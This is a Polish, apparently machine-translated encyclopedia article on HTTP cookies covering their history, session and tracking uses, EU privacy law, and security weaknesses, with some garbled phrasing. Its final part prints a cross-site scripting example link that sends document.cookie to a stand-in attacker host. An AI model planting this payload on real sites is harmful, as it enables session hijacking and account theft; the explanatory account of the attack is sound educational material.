in Definicje, Wiki

Internetowy plik cookie: co to jest? Definicja, pochodzenie, rodzaje i prywatność

Jaka jest rola pliku cookie, czym jest i jakie są rodzaje plików cookie? 🍪

56.3k odwiedzajacy 384 Głosów

Internetowy plik cookie: co to jest? Definicja, pochodzenie, rodzaje i prywatność
Internetowy plik cookie: co to jest? Definicja, pochodzenie, rodzaje i prywatność

Un plik cookie lub plik cookie sieci (lub ciastko, w skrócie świadek w Quebecu) jest definiowana przez protokół komunikacyjny HTTP jako sekwencja informacji wysyłanych przez serwer HTTP do klienta HTTP, którą ten ostatni zwraca za każdym razem, gdy ten sam serwer HTTP jest wysyłany pod pewnymi warunkami.

Plik cookie jest odpowiednikiem a mały plik tekstowy przechowywany na terminalu użytkownika Internetu. Istniejące od ponad 20 lat pozwalają twórcom stron internetowych na przechowywanie danych użytkowników w celu ułatwienia im nawigacji i udostępnienia określonych funkcjonalności. Pliki cookie zawsze były mniej lub bardziej kontrowersyjne, ponieważ zawierają szczątkowe dane osobowe, które mogą potencjalnie zostać wykorzystane przez osoby trzecie.

Jest wysyłany jako nagłówek HTTP przez serwer WWW do przeglądarki internetowej, która zwraca go w niezmienionej postaci za każdym razem, gdy uzyskuje dostęp do serwera. Plik cookie może być używany do uwierzytelnienie, Sesja (utrzymanie stanu) i za przechowywać określone informacje o użytkowniku, takie jak preferencje witryny lub zawartość elektronicznego koszyka. Termin cookie pochodzi od magiczne ciastko, dobrze znana koncepcja w komputerach UNIX, która zainspirowała pomysł i nazwę plików cookie przeglądarki. Istnieje kilka alternatyw dla plików cookie, z których każda ma swoje własne zastosowania, zalety i wady.

Będąc zwykłymi plikami tekstowymi, pliki cookie nie są wykonywalne. Oni nie są ani spyware ani wirusy, chociaż pliki cookie z niektórych witryn są wykrywane przez wiele programów antywirusowych, ponieważ umożliwiają śledzenie użytkowników, którzy odwiedzają wiele witryn. 

Większość nowoczesnych przeglądarek umożliwia użytkownikom zdecydować, czy zaakceptować, czy odrzucić pliki cookie. Użytkownicy mogą również wybierz, jak długo pliki cookie mają być przechowywane. Jednak całkowite odrzucenie plików cookie powoduje, że niektóre witryny są bezużyteczne. Na przykład przechowuj koszyki lub witryny, które wymagają logowania przy użyciu poświadczeń (nazwa użytkownika i hasło).

Spis treści

Historia

termin ciastko pochodzi od angielskiego terminu magiczne ciastko, czyli pakiet danych, który program otrzymuje i zwraca bez zmian. Pliki cookie były już używane w informatyce, kiedy Lou Montulliego wpadł na pomysł wykorzystania ich w komunikacji internetowej w czerwcu 1994. W tym czasie był zatrudniony w firmie Netscape Communications, która dla klienta opracowała aplikację e-commerce. Cookies rozwiązały problem niezawodności działania wirtualnego koszyka sklepu.

John Giannandrea i Lou Montulli napisali pierwszą specyfikację plików cookie firmy Netscape w tym samym roku. Wersja 0.9 beta Mosaic Netscape, wydana 13 października 1994, zintegrowana technologia ciasteczek (zobacz post). Pierwsze (nieeksperymentalne) użycie plików cookie miało na celu ustalenie, czy odwiedzający witrynę Netscape odwiedzili ją wcześniej. Montulli złożył wniosek patentowy na technologię ciasteczek w 1995 roku i przyznano patent USA 5774670 XNUMX XNUMX. przyznany w 1998 r.

Po zaimplementowaniu w Netscape 0.9 beta w 1994 roku, pliki cookie zostały zintegrowane z Internet Explorerem 2, wydanym w październiku 1995 roku.

Wprowadzenie plików cookie nie było jeszcze powszechnie znane opinii publicznej. W szczególności domyślnie akceptowane są pliki cookies w ustawieniach przeglądarki, a użytkownicy nie są informowani o ich obecności. Niektórzy ludzie byli świadomi istnienia plików cookie około pierwszego kwartału 1995 r., ale opinia publiczna dowiedziała się o ich istnieniu dopiero po opublikowaniu artykułu w Financial Times 12 lutego 1996 r. W tym samym roku pliki cookie wzbudziły duże zainteresowanie mediów ze względu na możliwe naruszenia prywatności. Temat plików cookie był omawiany podczas dwóch konsultacji Amerykańskiej Federalnej Komisji Handlu w latach 1996 i 1997.

Prace nad oficjalną specyfikacją plików cookie były już w toku. Pierwsze dyskusje nad oficjalną specyfikacją miały miejsce w kwietniu 1995 roku na liście mailingowej www-talk. Utworzono specjalną grupę roboczą IETF. Brian Behlendorf i David Kristol zaproponowali dwie alternatywne propozycje wprowadzenia stanu do transakcji HTTP, ale grupa kierowana przez samego Kristola postanowiła wykorzystać specyfikację Netscape jako punkt wyjścia. W lutym 1996 r. grupa robocza ustaliła, że ​​pliki cookie stron trzecich stanowią poważne zagrożenie dla prywatności. Specyfikacja opracowana przez grupę została ostatecznie opublikowana jako RFC 2109.

Od końca 2014 roku na wielu stronach widzimy baner o plikach cookie. Istnieje co najmniej jedno rozszerzenie przeglądarki, które umożliwia baner się nie wyświetla.

Rodzaje plików cookie i zastosowania

Zarządzanie sesją

Pliki cookie mogą służyć do przechowywania danych użytkownika podczas nawigacji, ale także podczas wielu wizyt. Pliki cookie zostały wprowadzone w celu umożliwienia realizacji elektronicznych koszyków, wirtualnego urządzenia, w którym użytkownik może gromadzić przedmioty, które chce kupić podczas przeglądania strony.

Obecnie aplikacje takie jak koszyki przechowują zamiast tego listę elementów w bazie danych na serwerze, co jest preferowane; niż zapisywanie ich w samym pliku cookie. Serwer WWW wysyła plik cookie zawierający unikalny identyfikator sesji. Następnie przeglądarka internetowa zwraca ten identyfikator sesji przy każdym kolejnym żądaniu, a pozycje w koszyku są zapisywane i kojarzone z tym samym unikalnym identyfikatorem sesji.

Częste korzystanie z plików cookie jest przydatne do logowania się na stronie za pomocą poświadczeń. Krótko mówiąc, serwer WWW najpierw wysyła plik cookie zawierający unikalny identyfikator sesji. Następnie użytkownicy podają swoje dane uwierzytelniające (zazwyczaj nazwę użytkownika i hasło). Następnie aplikacja internetowa uwierzytelnia sesję i umożliwia użytkownikowi dostęp do usługi.

personalizacja

Pliki cookies mogą być wykorzystywane do zapamiętywania informacji o użytkowniku serwisu, aby w przyszłości wyświetlić mu odpowiednie treści. Na przykład serwer sieciowy może wysłać plik cookie zawierający ostatnią nazwę użytkownika używaną do logowania się do tej witryny, dzięki czemu nazwa użytkownika może zostać wstępnie wypełniona podczas przyszłych wizyt.

Wiele stron internetowych wykorzystuje pliki cookie do personalizacji w oparciu o preferencje użytkownika. Użytkownicy wybierają swoje preferencje w formularzu i przesyłają je do serwera. Serwer koduje preferencje w pliku cookie i odsyła je z powrotem do przeglądarki. Następnie za każdym razem, gdy użytkownik uzyskuje dostęp do strony tej witryny, przeglądarka zwraca plik cookie, a tym samym listę preferencji; serwer może następnie dostosować stronę zgodnie z preferencjami użytkownika. Na przykład witryna Wikipedia umożliwia swoim użytkownikom wybranie preferowanej skórki witryny. Wyszukiwarka Google pozwala swoim użytkownikom (nawet jeśli nie są zarejestrowani) wybrać liczbę wyników, które chcą zobaczyć na każdej stronie wyników.

Śledzenie

Śledzące pliki cookie służą do śledzenia nawyków przeglądania Internetu przez użytkowników. Można to również zrobić częściowo za pomocą adresu IP komputera wysyłającego żądanie do strony lub za pomocą nagłówka HTTP „referrer”, który klient wysyła przy każdym żądaniu, ale pliki cookie pozwalają na większą precyzję. Można to zrobić tak, jak w poniższym przykładzie:

  1. Jeżeli użytkownik wywoła stronę w serwisie, a żądanie nie zawiera pliku cookie, serwer przyjmuje, że jest to pierwsza strona odwiedzana przez użytkownika. Następnie serwer tworzy losowy ciąg znaków i wysyła go do przeglądarki wraz z żądaną stroną.
  2. Od tego momentu plik cookie będzie automatycznie wysyłany przez przeglądarkę przy każdym wywołaniu nowej strony serwisu. Serwer wyśle ​​stronę jak zwykle, ale również zarejestruje adres URL wywoływanej strony, datę, godzinę żądania i plik cookie w pliku dziennika.

Przeglądając plik dziennika, można zobaczyć, które strony odwiedził użytkownik i w jakiej kolejności. Na przykład, jeśli plik zawiera kilka żądań wysłanych za pomocą pliku cookie id=abc, może to oznaczać, że wszystkie te żądania pochodzą od tego samego użytkownika. Żądany adres URL, data i godzina związana z żądaniami umożliwiają śledzenie przeglądania przez użytkownika.

Wyjaśnione poniżej pliki cookie i sygnały nawigacyjne stron trzecich dodatkowo umożliwiają śledzenie w różnych witrynach. Śledzenie pojedynczej witryny jest zwykle używane do celów statystycznych. Natomiast śledzenie w różnych witrynach za pomocą plików cookie stron trzecich jest zazwyczaj wykorzystywane przez firmy reklamowe do tworzenia anonimowych profili użytkowników (które są następnie wykorzystywane do określania, które reklamy powinny być wyświetlane użytkownikowi, a także do wysyłania mu e-maili odpowiadających tym reklamom — SPAM) ).

Śledzące pliki cookie stanowią ryzyko naruszenia prywatności użytkownika, ale można je łatwo usunąć. Większość nowoczesnych przeglądarek zawiera opcję automatycznego usuwania trwałych plików cookie podczas zamykania aplikacji.

Pliki cookie osób trzecich

Obrazy i inne obiekty zawarte na stronie internetowej mogą znajdować się na serwerach innych niż ten, na którym znajduje się strona. Aby wyświetlić stronę, przeglądarka pobiera wszystkie te obiekty. Większość stron internetowych zawiera informacje z różnych źródeł. Na przykład, jeśli wpiszesz w wyszukiwarkę www.example.com, często na części strony pojawią się obiekty lub reklamy pochodzące z innych źródeł, tj. z innej domeny niż www.example.com. „Własne” pliki cookie to pliki cookie ustawiane przez domenę wymienioną w pasku adresu przeglądarki. Pliki cookie stron trzecich są ustawiane przez jeden z obiektów strony, który pochodzi z innej domeny.

Domyślnie przeglądarki takie jak Mozilla Firefox, Microsoft Internet Explorer i Opera akceptują pliki cookie innych firm, ale użytkownicy mogą zmienić ustawienia w opcjach przeglądarki, aby je zablokować. Nie ma żadnego zagrożenia bezpieczeństwa związanego z plikami cookie stron trzecich, które umożliwiają funkcjonalność sieci, jednak są one również wykorzystywane do śledzenia użytkowników. z serwisu na serwis.

Narzędzia takie jak Ghostery dostępne dla wszystkich przeglądarek, w tym Google Chrome, mogą blokować wymianę między stronami trzecimi.

Realizacja

Możliwa interakcja między przeglądarką internetową a serwerem hostującym stronę internetową. Serwer wysyła plik cookie do przeglądarki, a przeglądarka odsyła go, gdy wywołuje inną stronę.
Możliwa interakcja między przeglądarką internetową a serwerem hostującym stronę internetową. Serwer wysyła plik cookie do przeglądarki, a przeglądarka odsyła go, gdy wywołuje inną stronę.

Pliki cookie to małe fragmenty danych wysyłane przez serwer WWW do przeglądarki. Przeglądarka zwraca je niezmienione na serwer, wprowadzając stan (pamięć przeszłych zdarzeń) do bezstanowej transakcji HTTP. Bez plików cookie każde wywołanie strony internetowej lub elementu strony internetowej jest odosobnionym zdarzeniem, niezależnym od innych żądań skierowanych do tej samej witryny. Oprócz możliwości ustawiania przez serwer sieciowy, pliki cookie mogą być również ustawiane przez języki skryptowe, takie jak JavaScript, jeśli są obsługiwane i autoryzowane przez przeglądarkę.

Oficjalna specyfikacja plików cookie sugeruje, że przeglądarki powinny mieć możliwość zapisywania i ponownego wysyłania minimalnej liczby plików cookie. W szczególności przeglądarka powinna być w stanie przechowywać co najmniej 300 plików cookie o wielkości czterech kilobajtów każdy oraz co najmniej 20 plików cookie dla pojedynczego serwera lub domeny.

Zgodnie z sekcją 3.1 ust RFC 2965, w nazwach plików cookie nie jest rozróżniana wielkość liter.

Plik cookie może określać datę jego wygaśnięcia, w takim przypadku plik cookie zostanie usunięty w tym dniu. Jeśli plik cookie nie określa daty wygaśnięcia, plik cookie jest usuwany, gdy tylko użytkownik opuści przeglądarkę. Dlatego określenie daty wygaśnięcia jest sposobem na to, aby plik cookie przetrwał wiele sesji. Z tego powodu mówi się o plikach cookie z datą ważności uporczywy. Przykład zastosowania: witryna sprzedaży detalicznej może wykorzystywać trwałe pliki cookie do rejestrowania pozycji, które użytkownicy umieścili w koszyku (w rzeczywistości plik cookie może odnosić się do wpisu zapisanego w bazie danych witryny sprzedaży, a nie na Twoim komputerze) . Dzięki temu, jeśli użytkownik opuści przeglądarkę bez dokonania zakupu i wróci do niej później, będzie mógł ponownie znaleźć pozycje w koszyku. Gdyby te pliki cookie nie dawały daty wygaśnięcia, wygasłyby z chwilą zamknięcia przeglądarki, a informacje o zawartości koszyka zostałyby utracone.

Pliki cookie mogą mieć ograniczony zakres do określonej domeny, subdomeny lub ścieżki na serwerze, który je utworzył.

Przesyłanie stron internetowych odbywa się za pomocą protokołu HyperText Transfer Protocol (HTTP). Ignorując pliki cookie, przeglądarki wywołują stronę z serwerów sieciowych, zazwyczaj wysyłając im krótki tekst o nazwie Żądanie HTTP. Na przykład, aby uzyskać dostęp do strony www.example.org/index.html, przeglądarki łączą się z serwerem www.example.org i wysyłają żądanie, które wygląda tak:

GET /index.html HTTP/1.1Host: www.example.org
nawigatorServeur

Serwer odpowiada wysyłając żądaną stronę, poprzedzoną podobnym tekstem, całość wywoływana Odpowiedź HTTP. Ten pakiet może zawierać wiersze instruujące przeglądarkę, aby przechowywała pliki cookie:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(strona HTML)
nawigatorServeur

Serwer wysyła linię Set-Cookie tylko wtedy, gdy serwer chce, aby przeglądarka przechowywała plik cookie. Set-Cookie to żądanie przeglądarki dotyczące przechowywania łańcucha nazwa=wartość i zwracania go we wszystkich przyszłych żądaniach do serwera. Jeśli przeglądarka obsługuje pliki cookie, a pliki cookie są włączone w opcjach przeglądarki, plik cookie będzie uwzględniany we wszystkich kolejnych żądaniach kierowanych do tego samego serwera. Na przykład przeglądarka wywołuje stronę www.example.org/news.html, wysyłając następujące żądanie do serwera www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
nawigatorServeur

To jest żądanie innej strony z tego samego serwera i różni się od pierwszego powyższego, ponieważ zawiera ciąg znaków, który serwer wysłał wcześniej do przeglądarki. Dzięki temu serwer wie, że to żądanie jest powiązane z poprzednim. Serwer odpowiada wysyłając wywoływaną stronę, a także dodając do niej inne pliki cookie.

Wartość cookie może zostać zmieniona przez serwer poprzez wysłanie nowej linii Set-Cookie: nazwa=nowa_wartość w odpowiedzi na wywoływaną stronę. Następnie przeglądarka zastępuje starą wartość nową.

Linia Set-Cookie jest zwykle tworzona przez program CGI lub inny język skryptowy, a nie przez serwer HTTP. Serwer HTTP (przykład: Apache) przekaże do przeglądarki jedynie wynik działania programu (dokument poprzedzony nagłówkiem zawierającym cookies).

Cookies mogą być również ustawione przez JavaScript lub inne podobne języki uruchomione w przeglądarce, tj. po stronie klienta, a nie serwera. W JavaScript służy do tego celu obiekt document.cookie. Na przykład instrukcja document.cookie = "temperature=20" tworzy plik cookie o nazwie "temperatura" i wartości 20.

Przykład odpowiedzi HTTP z google.com, która ustawia plik cookie z atrybutami.
Przykład odpowiedzi HTTP z google.com, która ustawia plik cookie z atrybutami.

Oprócz pary nazwa/wartość plik cookie może również zawierać datę wygaśnięcia, ścieżkę, nazwę domeny oraz typ zamierzonego połączenia, tj. zwykłe lub szyfrowane. RFC 2965 określa również, że pliki cookie muszą mieć obowiązkowy numer wersji, ale jest to generalnie pomijane. Te części danych następują po parze nazwa=nowa_wartość i są oddzielone średnikami. Na przykład plik cookie może zostać utworzony przez serwer, wysyłając linię Set-Cookie: nazwa=nowa_wartość; wygasa=data; ścieżka=/; domena=.przyklad.org.

Cookies wygasają i nie są wtedy wysyłane przez przeglądarkę na serwer w następujących sytuacjach:

  • Kiedy przeglądarka jest zamknięta, jeśli plik cookie nie jest trwały.
  • Kiedy minęła data ważności pliku cookie.
  • Kiedy data wygaśnięcia pliku cookie zostanie zmieniona (przez serwer lub skrypt) na datę z przeszłości.
  • Gdy przeglądarka usunie plik cookie na żądanie użytkownika.

Trzecia sytuacja umożliwia serwerom lub skryptom jawne usunięcie pliku cookie. Należy pamiętać, że w przeglądarce internetowej Google Chrome możliwe jest poznanie daty wygaśnięcia określonego pliku cookie poprzez dostęp do ustawień treści. Plik cookie zapisany na komputerze może równie dobrze pozostać tam przez kilkadziesiąt lat, jeśli nie zostanie podjęta żadna procedura jego usunięcia.

Otrzymane pomysły

Od czasu ich wprowadzenia w Internecie, w Internecie iw mediach krążyło wiele pomysłów na temat plików cookie. W 1998 roku CIAC, zespół monitorujący incydenty komputerowe Departamentu Energii Stanów Zjednoczonych, ustalił, że luki w zabezpieczeniach plików cookie „zasadniczo nie istnieją” i wyjaśnił, że „informacje o pochodzeniu twoich odwiedzin i szczegóły odwiedzonych stron internetowych już istnieją w plikach dziennika serwerów sieciowych”. W 2005 roku firma Jupiter Research opublikowała wyniki badania, w którym znaczny odsetek respondentów rozważał następujące stwierdzenia:

  • Pliki cookie są jak wirus, infekują dyski twarde użytkowników.
  • Pliki cookie generują pop-up.
  • Pliki cookie służą do wysyłania spam.
  • Pliki cookie są wykorzystywane wyłącznie w celach reklamowych.

Pliki cookie nie mogą usuwać ani odczytywać informacji z komputera użytkownika. Pliki cookie umożliwiają jednak wykrycie stron internetowych odwiedzanych przez użytkownika w danej witrynie lub zestawie witryn. Informacje te mogą być gromadzone w profilu użytkownika, który może być używany lub odsprzedawany stronom trzecim, co może powodować poważne problemy z prywatnością. Niektóre profile są anonimowe w tym sensie, że nie zawierają danych osobowych, ale nawet takie profile mogą budzić wątpliwości.

Według tego samego badania duży odsetek internautów nie wie, jak usunąć pliki cookie. Jednym z powodów, dla których ludzie nie ufają plikom cookie, jest to, że niektóre witryny nadużywają aspektu plików cookie umożliwiającego identyfikację osoby i udostępniają te informacje innym źródłom. Duży odsetek ukierunkowanych reklam i niechcianych wiadomości e-mail, uznawanych za spam, pochodzi z informacji uzyskanych ze śledzących plików cookie.

Ustawienia wyszukiwarki

Większość przeglądarek obsługuje pliki cookie i umożliwia użytkownikowi ich wyłączenie. Najczęstsze opcje to:

  • Włącz lub całkowicie wyłącz pliki cookie, aby były stale akceptowane lub blokowane.
  • Pozwól użytkownikowi zobaczyć aktywne pliki cookie na danej stronie, wpisując javascript: alert(document.cookie) w pasku adresu przeglądarki. Niektóre przeglądarki zawierają menedżera plików cookie dla użytkownika, który może przeglądać i selektywnie usuwać pliki cookie aktualnie przechowywane przez przeglądarkę.

Większość przeglądarek umożliwia również pełne usunięcie danych osobowych, w tym plików cookies. Istnieją również dodatkowe moduły kontrolujące uprawnienia do plików cookie.

Prywatność i pliki cookie stron trzecich

W tym fikcyjnym przykładzie firma reklamowa umieściła banery na dwóch stronach internetowych. Hostując banery na swoich serwerach i korzystając z plików cookie stron trzecich, firma reklamowa jest w stanie śledzić nawigację użytkownika po tych dwóch witrynach.

Pliki cookie mają istotny wpływ na prywatność i anonimowość użytkowników sieci. Chociaż pliki cookie są odsyłane tylko do serwera, który je umieścił, lub do serwera należącego do tej samej domeny internetowej, strona internetowa może jednak zawierać obrazy lub inne elementy przechowywane na serwerach należących do innych domen. Pliki cookie, które są ustawiane podczas odzyskiwania tych zewnętrznych komponentów, są nazywane pliki cookie osób trzecich. Obejmuje to pliki cookie z niechcianych wyskakujących okienek.

Firmy reklamowe używają plików cookie stron trzecich do śledzenia użytkowników w różnych odwiedzanych przez nich witrynach. W szczególności firma reklamowa może śledzić użytkownika na wszystkich stronach, na których umieściła obrazy reklamowe lub piksel śledzący. Znajomość stron odwiedzanych przez użytkownika umożliwia firmie reklamowej targetowanie preferencji reklamowych użytkownika.

Możliwość zbudowania profilu użytkownika jest przez niektórych uważana za naruszenie prywatności, zwłaszcza gdy śledzenie odbywa się w różnych domenach przy użyciu plików cookie stron trzecich. Z tego powodu w niektórych krajach obowiązują przepisy dotyczące plików cookie.

Rząd Stanów Zjednoczonych wprowadził surowe zasady dotyczące umieszczania plików cookie w 2000 r., po tym, jak ujawniono, że Biuro ds. Polityki Narkotykowej Białego Domu używa plików cookie do śledzenia komputerów użytkowników przeglądających reklamy narkotyków w Internecie. W 2002 roku działacz na rzecz prywatności Daniel Brandt odkrył, że CIA pozostawiła trwałe pliki cookie na komputerach, które odwiedzały jej strony internetowe. Po poinformowaniu o tym naruszeniu CIA oświadczyła, że ​​te pliki cookie nie zostały celowo wysłane i zaprzestała ich ustawiania. 25 grudnia 2005 roku Brandt odkrył, że Agencja Bezpieczeństwa Narodowego (NSA) pozostawiła dwa trwałe pliki cookie na komputerach gości z powodu aktualizacji oprogramowania. Po otrzymaniu powiadomienia NSA natychmiast wyłączyła pliki cookie.

W Wielkiej Brytanii tzw Prawo dotyczące plików cookie „, która weszła w życie 25 maja 2012 r., zobowiązuje strony do zadeklarowania swoich zamiarów, dając tym samym użytkownikom możliwość wyboru, czy chcą pozostawiać ślady swojego przejścia w Internecie, czy też nie. W ten sposób można je chronić przed kierowaniem reklam. Jednakże, według The Guardian, zgoda internautów niekoniecznie jest wyraźna; dokonano zmian w warunkach zgody użytkownika, czyniąc to w ten sposób dorozumiany.

Dyrektywa 2002/58 w sprawie prywatności

Dyrektywa 202/58 o prywatności i łączności elektronicznej zawiera zasady korzystania z plików cookie. W szczególności art. 5 ust. 3 tej dyrektywy wymaga, aby przechowywanie danych (takich jak pliki cookie) na komputerze użytkownika było możliwe tylko wtedy, gdy:

  • użytkownik jest informowany o sposobie wykorzystania danych;
  • użytkownik ma możliwość odrzucenia tej operacji przechowywania. Jednak artykuł ten stanowi również, że przechowywanie danych ze względów technicznych jest wyłączone z tego prawa.

Zgodnie ze sprawozdaniem z grudnia 2003 r., które miało być wdrażane od października 2004 r., dyrektywa ta została wprowadzona w życie w bardzo niedoskonały sposób, w którym wskazano również, że niektóre państwa członkowskie (Słowacja, Łotwa, Grecja, Belgia i Luksemburg) nie dokonały jeszcze transpozycji dyrektywy do prawa krajowego.

Według opinii G29 z 2010 r. ta dyrektywa, która w szczególności uzależnia stosowanie plików cookie do celów reklamy behawioralnej od wyraźnej zgody internauty, pozostaje bardzo słabo stosowana. W rzeczywistości większość witryn robi to w sposób niezgodny z dyrektywą, ograniczając się do prostego „banera” informującego o korzystaniu z „cookies” bez podawania informacji o ich zastosowaniach, bez rozróżnienia między „technicznymi” plikami cookie. „śledzących” plików cookie ani oferowania rzeczywistego wyboru użytkownikowi, który chce zachować techniczne pliki cookie (takie jak pliki cookie do zarządzania koszykiem) i odmówić „śledzących” plików cookie. W rzeczywistości wiele witryn nie działa poprawnie, jeśli pliki cookie są odrzucane, co jest niezgodne z dyrektywą 2002/58 lub dyrektywą 95/46 (ochrona danych osobowych).

Dyrektywa 2009/136 / WE

Niniejszy materiał został zaktualizowany dyrektywą 2009/136/WE z dnia 25 listopada 2009 r., która stanowi, że „przechowywanie informacji lub uzyskiwanie dostępu do informacji już przechowywanych w urządzeniu końcowym abonenta lub użytkownika jest dozwolone wyłącznie pod warunkiem, że abonent lub użytkownik wyraził zgodę po otrzymaniu, zgodnie z dyrektywą 95/46/WE, między innymi jasnych i pełnych informacji o celach przetwarzania”. Nowa dyrektywa zaostrza więc obowiązki przed umieszczeniem plików cookies na komputerze internauty.

We wstępnych rozważaniach dyrektywy ustawodawca europejski precyzuje jednak: „Jeżeli jest to technicznie możliwe i skuteczne, zgodnie z odpowiednimi przepisami dyrektywy 95/46/WE, zgoda użytkownika na przetwarzanie może być wyrażona poprzez zastosowanie odpowiednich ustawień przeglądarki lub innej aplikacji”. Jednak w rzeczywistości żadna dotychczas przeglądarka nie umożliwia oddzielenia niezbędnych technicznych plików cookie od opcjonalnych, które należy pozostawić do wyboru użytkownika.

Ta nowa dyrektywa została transponowana przez belgijskich posłów w lipcu 2012 r. Badanie z 2014 r. pokazuje, że nawet posłowie mają trudności ze stosowaniem ograniczenia dyrektywy.

P3P

Specyfikacja P3P obejmuje możliwość określenia przez serwer polityki prywatności, która określa, jakie informacje gromadzi iw jakim celu. Zasady te obejmują (między innymi) wykorzystanie informacji zebranych za pomocą plików cookie. Zgodnie z definicjami P3P, przeglądarka może zaakceptować lub odrzucić pliki cookie, porównując politykę prywatności z preferencjami użytkownika lub pytając użytkownika, przedstawiając oświadczenie o ochronie prywatności zadeklarowane przez serwer.

Wiele przeglądarek, w tym Apple Safari i Microsoft Internet Explorer w wersjach 6 i 7, obsługuje protokół P3P, który pozwala przeglądarce określić, czy akceptować przechowywanie plików cookie stron trzecich. Przeglądarka Opera umożliwia użytkownikom odrzucanie plików cookie stron trzecich oraz tworzenie globalnego i specyficznego profilu bezpieczeństwa dla domen internetowych. Mozilla Firefox w wersji 2 porzuciła obsługę P3P, ale przywróciła ją w wersji 3.

Pliki cookie stron trzecich mogą być blokowane przez większość przeglądarek w celu zwiększenia prywatności i ograniczenia śledzenia reklam, bez negatywnego wpływu na korzystanie z Internetu przez użytkownika. Wiele agencji reklamowych oferuje taką opcję zrezygnować do ukierunkowanej reklamy, ustawiając w przeglądarce ogólny plik cookie, który dezaktywuje to kierowanie, ale takie rozwiązanie nie jest praktycznie skuteczne, jeśli jest przestrzegane, ponieważ ten ogólny plik cookie jest usuwany, gdy tylko użytkownik usunie te pliki cookie, co anuluje zgodę decyzja.

Wady plików cookie

Oprócz kwestii związanych z prywatnością, pliki cookie mają również pewne wady techniczne. W szczególności nie zawsze dokładnie identyfikują użytkowników, mogą spowolnić działanie witryny, gdy występują w dużych ilościach, mogą być wykorzystywane do ataków na bezpieczeństwo i kolidują z reprezentatywnym transferem stanu, stylem architektonicznym oprogramowania.

Nieprecyzyjna identyfikacja

Jeżeli na komputerze używana jest więcej niż jedna przeglądarka, w każdej z nich zawsze znajduje się oddzielna jednostka do przechowywania plików cookies. Pliki cookie nie identyfikują zatem osoby, ale kombinację konta użytkownika, komputera i przeglądarki internetowej. W ten sposób każdy może korzystać z tych kont, komputerów lub przeglądarek, które mają zestaw plików cookie. Podobnie pliki cookie nie rozróżniają wielu użytkowników korzystających z tego samego konta użytkownika, komputera i przeglądarki, na przykład w „kafejkach internetowych” lub w dowolnym miejscu zapewniającym swobodny dostęp do zasobów komputera.

Jednak w praktyce twierdzenie to okazuje się w większości przypadków błędne, ponieważ dzisiaj komputer "osobisty" (albo smartfon, czy tablet, co gorsza) jest używany głównie przez jedną osobę. To sprowadza się do namierzania konkretnej osoby i poprzez ilość zebranych informacji dojść do spersonalizowanego targetowania, nawet jeśli dana osoba nie jest „mianowicie” zidentyfikowana.

Plik cookie może zostać skradziony przez inny komputer w sieci.

Podczas normalnego działania pliki cookie są przesyłane zwrotnie między serwerem (lub grupą serwerów w tej samej domenie) a przeglądarką komputera użytkownika. Ponieważ pliki cookies mogą zawierać informacje wrażliwe (nazwa użytkownika, hasło służące do uwierzytelniania itp.), ich wartości nie powinny być dostępne dla innych komputerów. Kradzież plików cookie to przechwycenie plików cookie przez nieupoważnioną osobę trzecią.

Pliki cookie mogą zostać skradzione za pomocą sniffera pakietów w ataku zwanym przejęciem sesji. Ruch w sieci może być przechwytywany i odczytywany przez komputery inne niż wysyłające i odbierające (zwłaszcza w niezaszyfrowanej publicznej przestrzeni Wi-Fi). Ruch ten obejmuje pliki cookie wysyłane podczas sesji przy użyciu zwykłego protokołu HTTP. Gdy ruch sieciowy nie jest szyfrowany, szkodliwi użytkownicy mogą odczytywać komunikację innych użytkowników w sieci za pomocą „snifferów pakietów”.

Problem ten można rozwiązać, szyfrując połączenie między komputerem użytkownika a serwerem za pomocą protokołu HTTPS. Serwer może określić a bezpieczna flaga podczas ustawiania pliku cookie; przeglądarka wyśle ​​go tylko przez bezpieczną linię, taką jak połączenie SSL.

Jednak wiele witryn, mimo że wykorzystuje szyfrowaną komunikację HTTPS do uwierzytelniania użytkownika (np. strona logowania), później wysyła sesyjne pliki cookie i inne dane w normalny sposób za pośrednictwem niezaszyfrowanych połączeń HTTP ze względu na wydajność. Atakujący mogą w ten sposób przechwytywać pliki cookie innych użytkowników i podszywać się pod nich na odpowiednich stronach lub wykorzystywać je w atakach na pliki cookie.

Skrypty w witrynie: plik cookie, który powinien być wymieniany tylko między serwerem a klientem, jest wysyłany do innej strony trzeciej.

Innym sposobem kradzieży plików cookie jest tworzenie skryptów witryn i zmuszanie przeglądarki do wysyłania plików cookie do złośliwych serwerów, które nigdy ich nie otrzymują. Nowoczesne przeglądarki umożliwiają wykonanie poszukiwanych fragmentów kodu z serwera. W przypadku uzyskiwania dostępu do plików cookie w czasie działania, ich wartości mogą być przekazywane w jakiejś formie do serwerów, które nie powinny mieć do nich dostępu. Szyfrowanie plików cookie przed ich wysłaniem przez sieć nie pomaga udaremnić ataku.

Ten typ skryptów w witrynie jest zwykle wykorzystywany przez osoby atakujące w witrynach umożliwiających użytkownikom publikowanie zawartości HTML. Integrując część kompatybilnego kodu z wkładem HTML, osoba atakująca może otrzymać pliki cookie od innych użytkowników. Znajomość tych plików cookie można wykorzystać, łącząc się z tą samą witryną za pomocą skradzionych plików cookie, w ten sposób rozpoznając użytkownika, którego pliki cookie zostały skradzione.

Jednym ze sposobów zapobiegania takim atakom jest użycie flagi HttpOnly; jest to opcja, wprowadzona od wersji 6 Internet Explorera w PHP od wersji 5.2.0, która ma uniemożliwić klientowi dostęp do pliku cookie blisko skryptu. Jednak twórcy stron internetowych powinni wziąć to pod uwagę przy opracowywaniu witryny, aby byli odporni na skrypty w witrynie.

Innym wykorzystywanym zagrożeniem bezpieczeństwa jest tworzenie żądań w witrynie.

Oficjalna specyfikacja techniczna dopuszcza odsyłanie plików cookies jedynie do serwerów w domenie, z której pochodzą. Jednak wartość plików cookie może być przesyłana do innych serwerów za pomocą innych środków niż nagłówki plików cookie.

W szczególności języki skryptowe, takie jak JavaScript, mają ogólnie dostęp do wartości plików cookie i mogą wysyłać dowolne wartości do dowolnego serwera w Internecie. Ta funkcja skryptów jest używana w witrynach internetowych, umożliwiając użytkownikom publikowanie treści HTML, aby inni użytkownicy mogli je przeglądać.

Na przykład osoba atakująca działająca w domenie example.com może opublikować komentarz zawierający następujące łącze wskazujące na popularny blog, nad którym nie ma kontroli:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

